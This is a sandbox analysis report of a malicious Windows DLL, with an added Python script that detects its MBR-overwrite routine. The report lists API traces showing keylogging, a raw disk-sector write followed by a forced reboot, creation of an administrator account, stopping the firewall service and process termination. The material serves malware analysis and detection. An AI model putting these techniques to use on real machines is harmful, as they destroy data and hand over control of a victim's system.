                                                  • GetKeyState.USER32(00000010), ref: 1000B8FB
                                                  • GetAsyncKeyState.USER32(0000000D), ref: 1000B907
                                                  • GetKeyState.USER32(00000014), ref: 1000B914
                                                  • GetKeyState.USER32(00000014), ref: 1000B93C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$AsyncSleeplstrlen
                                                  • String ID: <BackSpace>$<Enter>
                                                  • API String ID: 43598291-3792472884
                                                  • Opcode ID: 600104d3a6fed73dbf7a32e2fc48a2a7b55119f13c72bea2c34559d00484d6f4
                                                  • Instruction ID: 254073e1c1d6b0a9fa3052202c61483a4731d11cdb8d0cac1f822bb488184c88
                                                  • Opcode Fuzzy Hash: 600104d3a6fed73dbf7a32e2fc48a2a7b55119f13c72bea2c34559d00484d6f4
                                                  • Instruction Fuzzy Hash: C3510471508B86ABF710DF64CC847AF73E9EB82384F010E2DEA5192194DB35D949C753
                                                  APIs
                                                  • CreateFileA.KERNEL32 ref: 1000E6D2
                                                  • DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 1000E705
                                                  • WriteFile.KERNEL32(00000000,00000000,00000200,00000000,00000000), ref: 1000E719
                                                  • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 1000E734
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000E737
                                                  • Sleep.KERNEL32(000007D0), ref: 1000E742
                                                  • GetVersion.KERNEL32 ref: 1000E748
                                                  • ExitWindowsEx.USER32(00000006,00000000), ref: 1000E768
                                                  • ExitProcess.KERNEL32 ref: 1000E770
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$ControlDeviceExitFile$CloseCreateCurrentHandleOpenSleepTokenVersionWindowsWrite
                                                  • String ID: SeShutdownPrivilege$U$\\.\PHYSICALDRIVE0
                                                  • API String ID: 554375110-3993181469
                                                  • Opcode ID: 0afe2ad8e16ea5edbc017d365728db05ca0ba4cd117a679420f1a44199d0639f
                                                  • Instruction ID: f74105865133530c9c42a2179fda12015e9b4dafff81d6fb0ebd67d8a36456bb
                                                  • Opcode Fuzzy Hash: 0afe2ad8e16ea5edbc017d365728db05ca0ba4cd117a679420f1a44199d0639f
                                                  • Instruction Fuzzy Hash: BE210735284751BBF230EB64DC4AFDB3B94BB84B10F240614FB697E1D0DAA465048B6A
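The function at 1000E6D2 above is the boot-sector routine: its strings include \\.\PHYSICALDRIVE0 and SeShutdownPrivilege, the first DeviceIoControl uses control code 00090018 (FSCTL_LOCK_VOLUME), WriteFile then writes exactly 00000200 bytes (one 512-byte sector, where the MBR lives), the second DeviceIoControl uses 0009001C (FSCTL_UNLOCK_VOLUME), and after a 000007D0 ms (2000 ms) Sleep the code calls ExitWindowsEx with flags 00000006, which is EWX_REBOOT | EWX_FORCE. The Python below is an added example, not part of the Joe Sandbox report and not code from the analysed DLL: it parses the report's own "• Api.MODULE(args), ref: ADDR" and "• String ID:" lines, decodes the CTL_CODE fields of each control code and the ExitWindowsEx flag bits, and flags the lock / sector-write / unlock sequence against a PHYSICALDRIVE path. SAMPLE is the 1000E6D2 listing copied from this report; the control-code table only names the three FSCTLs relevant here, and the rule names and the analyze() output keys are the editor's own choice.

```python
"""Decode one Joe Sandbox function-level API listing and flag a raw-sector overwrite.

Added example, not part of the report or of the analysed DLL. SAMPLE below is the
API listing and String ID line of the function at 1000E6D2 as printed in the report.
"""
import re

# "• Api.MODULE(args), ref: ADDR" or "• Api.MODULE ref: ADDR"; subcall lines carry
# a "Part of subcall function XXXX:" prefix that is kept as the parent address.
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
STRINGS_RE = re.compile(r"•\s*String ID:\s*(?P<strings>.*)")

# Control codes are CTL_CODE(DeviceType, Function, Method, Access) packed as
# DeviceType<<16 | Access<<14 | Function<<2 | Method. Only the three FSCTLs
# relevant here are named; anything else decodes to "unknown".
KNOWN_IOCTLS = {
    0x90018: "FSCTL_LOCK_VOLUME",      # CTL_CODE(FILE_DEVICE_FILE_SYSTEM=9, 6, 0, 0)
    0x9001C: "FSCTL_UNLOCK_VOLUME",    # CTL_CODE(FILE_DEVICE_FILE_SYSTEM=9, 7, 0, 0)
    0x90020: "FSCTL_DISMOUNT_VOLUME",  # CTL_CODE(FILE_DEVICE_FILE_SYSTEM=9, 8, 0, 0)
}
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
SECTOR_SIZE = 0x200  # the MBR occupies the first 512-byte sector of the disk

# Copied from the report's listing for the function at 1000E6D2.
SAMPLE = r"""
• CreateFileA.KERNEL32 ref: 1000E6D2
• DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 1000E705
• WriteFile.KERNEL32(00000000,00000000,00000200,00000000,00000000), ref: 1000E719
• DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 1000E734
• CloseHandle.KERNEL32(00000000), ref: 1000E737
• Sleep.KERNEL32(000007D0), ref: 1000E742
• GetVersion.KERNEL32 ref: 1000E748
• ExitWindowsEx.USER32(00000006,00000000), ref: 1000E768
• ExitProcess.KERNEL32 ref: 1000E770
  • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
  • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
• String ID: SeShutdownPrivilege$U$\\.\PHYSICALDRIVE0
"""


def decode_ioctl(code):
    """Return (name, device_type, function, method, access) for a control code."""
    return (KNOWN_IOCTLS.get(code, "unknown"), code >> 16,
            (code >> 2) & 0xFFF, code & 0x3, (code >> 14) & 0x3)


def decode_ewx(flags):
    """Name the ExitWindowsEx flag bits; EWX_LOGOFF is the all-zero value."""
    return [name for bit, name in EWX_FLAGS.items() if flags & bit] or ["EWX_LOGOFF"]


def _arg(text):
    # The sandbox prints constants as 8 hex digits, "?" when unresolved, else a string.
    return int(text, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", text) else text


def parse_block(text):
    """Split one function block into its API calls and its String ID values."""
    calls, strings = [], []
    for line in text.splitlines():
        m = API_RE.search(line)
        if m:
            args = [_arg(a.strip()) for a in m["args"].split(",")] if m["args"] else []
            calls.append({"api": m["api"], "module": m["module"], "args": args,
                          "ref": m["ref"], "subcall": m["parent"] is not None})
            continue
        s = STRINGS_RE.search(line)
        if s:
            strings.extend(v for v in s["strings"].split("$") if v)
    return calls, strings


def _in_order(events, pattern):
    # True when every element of pattern occurs in events, in that order.
    it = iter(events)
    return all(any(e == p for e in it) for p in pattern)


def analyze(text):
    """Flag lock -> 512-byte WriteFile -> unlock together with a PHYSICALDRIVE string."""
    calls, strings = parse_block(text)
    events, ioctls, reboots = [], [], []
    for c in (c for c in calls if not c["subcall"]):  # ignore the subcall's own APIs
        a = c["args"]
        if c["api"] == "DeviceIoControl" and len(a) > 1 and isinstance(a[1], int):
            ioctls.append(decode_ioctl(a[1])[0])
            events.append(ioctls[-1])
        elif c["api"] == "WriteFile" and len(a) > 2 and a[2] == SECTOR_SIZE:
            events.append("WRITE_SECTOR")
        elif c["api"] == "ExitWindowsEx" and a and isinstance(a[0], int):
            reboots.append(decode_ewx(a[0]))
    raw_disk = any(s.upper().startswith(r"\\.\PHYSICALDRIVE") for s in strings)
    return {
        "ioctls": ioctls,
        "mbr_overwrite": raw_disk and _in_order(
            events, ["FSCTL_LOCK_VOLUME", "WRITE_SECTOR", "FSCTL_UNLOCK_VOLUME"]),
        "forced_reboot": any("EWX_FORCE" in r for r in reboots),
        "reboot_flags": reboots,
        "privileges": [s for s in strings if s.startswith("Se") and s.endswith("Privilege")],
    }


if __name__ == "__main__":
    print(analyze(SAMPLE))
```

Any other function block from this report can be pasted in place of SAMPLE; blocks without the lock / write / unlock triple (the keylogger or directory-enumeration functions, for instance) return mbr_overwrite False. Subcall lines are parsed but excluded from the sequence match on purpose: the 1001B690 subcall is the privilege-adjustment helper and would otherwise contribute its OpenProcessToken / AdjustTokenPrivileges calls to every function that enables a privilege.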
                                                  APIs
                                                  • lstrlenA.KERNEL32(?,?,?,00000065), ref: 100090AA
                                                  • wsprintfA.USER32 ref: 100090FA
                                                  • FindFirstFileA.KERNEL32(?,?,?,100FA614,?,00000065), ref: 10009110
                                                  • LocalAlloc.KERNEL32(00000040,00002800,00000000,?,00000065), ref: 10009146
                                                  • LocalReAlloc.KERNEL32(00000000,?,00000042,?,00000065), ref: 10009174
                                                  • lstrlenA.KERNEL32(?,?,00000065), ref: 10009203
                                                  • FindNextFileA.KERNEL32(?,?,?,00000065), ref: 10009256
                                                  • LocalFree.KERNEL32(00000000,?,00000065), ref: 10009272
                                                  • FindClose.KERNEL32(?,?,00000065), ref: 1000927D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FindLocal$AllocFilelstrlen$CloseFirstFreeNextwsprintf
                                                  • String ID: .$h
                                                  • API String ID: 4283800025-2131999284
                                                  • Opcode ID: d7f2418d2bac61e650567f6f0334c0fa2d95e01bd6ac85b85340cba20e63c3a4
                                                  • Instruction ID: 8ddc5948962728d263d86cc1183bbf29d9fcaf852ba5ad52f36a13bdb15b276c
                                                  • Opcode Fuzzy Hash: d7f2418d2bac61e650567f6f0334c0fa2d95e01bd6ac85b85340cba20e63c3a4
                                                  • Instruction Fuzzy Hash: 2B51387560C3829BE710CF289C84ADBBBE5EF99384F144A58F8D897381D279990DC762
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000), ref: 10025AC9
                                                  • lstrlenA.KERNEL32(00000000), ref: 10025AD9
                                                  • lstrlenA.KERNEL32(00000000), ref: 10025AE2
                                                    • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 10024614
                                                    • Part of subcall function 100245F0: #823.MFC42(00000002,?,00000000,00000000), ref: 10024621
                                                    • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1002463D
                                                  • NetUserAdd.NETAPI32 ref: 10025B38
                                                  • #825.MFC42(?), ref: 10025B46
                                                  • #825.MFC42(?,?), ref: 10025B50
                                                  • wcscpy.MSVCRT ref: 10025B94
                                                  • #825.MFC42(?), ref: 10025B9F
                                                  • #825.MFC42(?,?), ref: 10025BA9
                                                  • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,?,00000001,?,00000000,00000001,?,?), ref: 10025BCC
                                                  • #825.MFC42(00000000,00000000,00000000,00000003,?,00000001,?,00000000,00000001,?,?), ref: 10025BD4
                                                  • LocalFree.KERNEL32(?,00000001,?,00000000,00000001,?,?), ref: 10025C05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #825$lstrlen$ByteCharLocalMultiWide$#823FreeGroupMembersUserwcscpy
                                                  • String ID:
                                                  • API String ID: 3899135135-0
                                                  • Opcode ID: 845040a6a147bf0244a5e108915e50923d3870f156928ecec06d720133b77a1b
                                                  • Instruction ID: dd9d3f93371bab7a31d82c422f9be74c5db956489815e8898b81c9b0b0312487
                                                  • Opcode Fuzzy Hash: 845040a6a147bf0244a5e108915e50923d3870f156928ecec06d720133b77a1b
                                                  • Instruction Fuzzy Hash: 7D41B4B56083046BD710DB74DC81EAFB7ECEFC4704F44092DF58497242EAB9E9498B62
                                                  APIs
                                                    • Part of subcall function 1002C6A0: LoadLibraryA.KERNEL32 ref: 1002C6B7
                                                    • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1002C6C7
                                                    • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1002C6D1
                                                    • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1002C6DD
                                                    • Part of subcall function 1002C6A0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 1002C6E8
                                                    • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1002C6F4
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000ED2D
                                                  • Process32First.KERNEL32(00000000,00000128), ref: 1000ED4F
                                                  • _strcmpi.MSVCRT ref: 1000ED70
                                                  • OpenProcess.KERNEL32(00000001,00000000,?,00000002,00000000), ref: 1000ED81
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000ED8A
                                                  • Process32Next.KERNEL32(00000000,?), ref: 1000ED92
                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000), ref: 1000ED9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoadProcessProcess32$CloseCreateFirstHandleNextOpenSnapshotTerminateToolhelp32_strcmpi
                                                  • String ID: SeDebugPrivilege$explorer.exe
                                                  • API String ID: 3814622859-2721386251
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,?), ref: 10023A21
                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 10023A35
                                                  • htons.WS2_32 ref: 10023A68
                                                  • bind.WS2_32 ref: 10023A83
                                                  • listen.WS2_32(00000000,00000032), ref: 10023A94
                                                  • accept.WS2_32(00000000,00000000,00000000), ref: 10023ABD
                                                  • malloc.MSVCRT ref: 10023AC3
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00023710,00000000,00000000,?), ref: 10023ADF
                                                  • Sleep.KERNEL32(000003E8), ref: 10023AEE
                                                  • CloseHandle.KERNEL32(00000000), ref: 10023AF7
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateHandleSleepStartupThreadacceptbindhtonslistenmallocsocket
                                                  • String ID:
                                                  • API String ID: 1905318980-0
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 100026B3
                                                  • GetClipboardData.USER32(00000001), ref: 100026C7
                                                  • GlobalLock.KERNEL32(00000000), ref: 100026D8
                                                  • EmptyClipboard.USER32 ref: 100026F2
                                                  • GlobalAlloc.KERNEL32(00000002), ref: 1000270A
                                                  • GlobalLock.KERNEL32(00000000), ref: 10002717
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 1000273B
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 10002744
                                                  • GlobalUnlock.KERNEL32(?), ref: 1000274F
                                                  • CloseClipboard.USER32 ref: 10002755
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyOpen
                                                  • String ID:
                                                  • API String ID: 3065066218-0
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 1002699D
                                                  • OpenServiceA.ADVAPI32(00000000,sharedaccess,000F01FF), ref: 100269B0
                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 100269BE
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,10024718), ref: 100269D3
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,10024718), ref: 100269E0
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,10024718), ref: 100269E3
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseHandleProcess$ControlCurrentManagerQueryStatusToken
                                                  • String ID: SeDebugPrivilege$sharedaccess
                                                  • API String ID: 3393504433-1846105483
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 10017BB2
                                                  • EmptyClipboard.USER32 ref: 10017BBE
                                                  • GlobalAlloc.KERNEL32(00002000,?,?,?), ref: 10017BCE
                                                  • GlobalLock.KERNEL32(00000000), ref: 10017BDC
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 10017BF9
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 10017C02
                                                  • GlobalFree.KERNEL32(00000000), ref: 10017C09
                                                  • CloseClipboard.USER32 ref: 10017C10
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                                  • String ID:
                                                  • API String ID: 453615576-0
                                                  Strings
                                                  • *** EMPTY bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 100804BE
                                                  • *** IFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 100802CC
                                                  • *** END, xrefs: 1008083B
                                                  • *** FINISH bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 100806E0
                                                  • PVOP, xrefs: 1008022C
                                                  • IVOP, xrefs: 100802F0
                                                  • *** BFRAME (flush) bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 10080402
                                                  • *** PFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 10080208, 100807E8
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *** BFRAME (flush) bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** EMPTY bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** END$*** FINISH bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** IFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** PFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i$IVOP$PVOP
                                                  • API String ID: 0-467185937
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 100025B8
                                                  • GetClipboardData.USER32(00000001), ref: 100025C6
                                                  • GlobalLock.KERNEL32(00000000), ref: 100025CF
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 10002609
                                                  • CloseClipboard.USER32 ref: 1000260F
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 10002632
                                                  • CloseClipboard.USER32 ref: 10002638
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$CloseUnlock$DataLockOpen
                                                  • String ID:
                                                  • API String ID: 2537359085-0
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                  • GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID:
                                                  • API String ID: 3398352648-0
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 100290D0
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 100290D7
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10029105
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000010,00000000,00000000), ref: 1002911D
                                                  • GetLastError.KERNEL32 ref: 10029123
                                                  • CloseHandle.KERNEL32(?), ref: 10029134
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID:
                                                  • API String ID: 3398352648-0
                                                  • Opcode ID: 149c958cf4e409a043c1ff8710811fbd874f2c7f626f077d67b57da5f78a4f18
                                                  • Instruction ID: 4db5a6e2c7b4cb126f103a4b1f94b4cfd3d626149b56619aedb11a4ed5bc1c08
                                                  • Opcode Fuzzy Hash: 149c958cf4e409a043c1ff8710811fbd874f2c7f626f077d67b57da5f78a4f18
                                                  • Instruction Fuzzy Hash: F4018879654310AFE304EB78CC89F9B77A8FB84B00F448A1DF68D96290D775D8048761
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 1001A107
                                                  • CoCreateInstance.OLE32(100EACE0,00000000,00000001,100EACC0,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001A11F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInitializeInstance
                                                  • String ID: FriendlyName
                                                  • API String ID: 3519745914-3623505368
                                                  • Opcode ID: fc36f0c2b445b7de094a84334f3024003ad039596e6c96a13255ec54081baec0
                                                  • Instruction ID: 59d40a70ec8d79e9cb2401fedf0ad3af46c2419484e2d0589d1503d06cb14a4e
                                                  • Opcode Fuzzy Hash: fc36f0c2b445b7de094a84334f3024003ad039596e6c96a13255ec54081baec0
                                                  • Instruction Fuzzy Hash: 06310674248202AFD604CF65CC88F5BB7E8FF89714F148958F549DB250DB74E88ACB62
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 10009C85
                                                  • FindClose.KERNEL32(00000000), ref: 10009D07
                                                  • CloseHandle.KERNEL32(?), ref: 10009D19
                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10009D31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileFind$CreateFirstHandle
                                                  • String ID: p
                                                  • API String ID: 3283578348-2181537457
                                                  • Opcode ID: 5ca221129d8a3a18f25eb801b6ab58ffdf62e839a6ab82df66ebab739c56a846
                                                  • Instruction ID: 2b1597b52ddb8eafb0e91e12b29208ebd2643c3ea00a9cd01ad1c39fb074611e
                                                  • Opcode Fuzzy Hash: 5ca221129d8a3a18f25eb801b6ab58ffdf62e839a6ab82df66ebab739c56a846
                                                  • Instruction Fuzzy Hash: 7631BC719087019BF324DF28CC45B8FB6D6EBC53A0F25461EF1AA873D4D634D4458B41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: bindsocket
                                                  • String ID:
                                                  • API String ID: 3370621091-0
                                                  • Opcode ID: 85dc332e68de125305a9dd3892cc226241b1110390aa54452521c95da12b1cd6
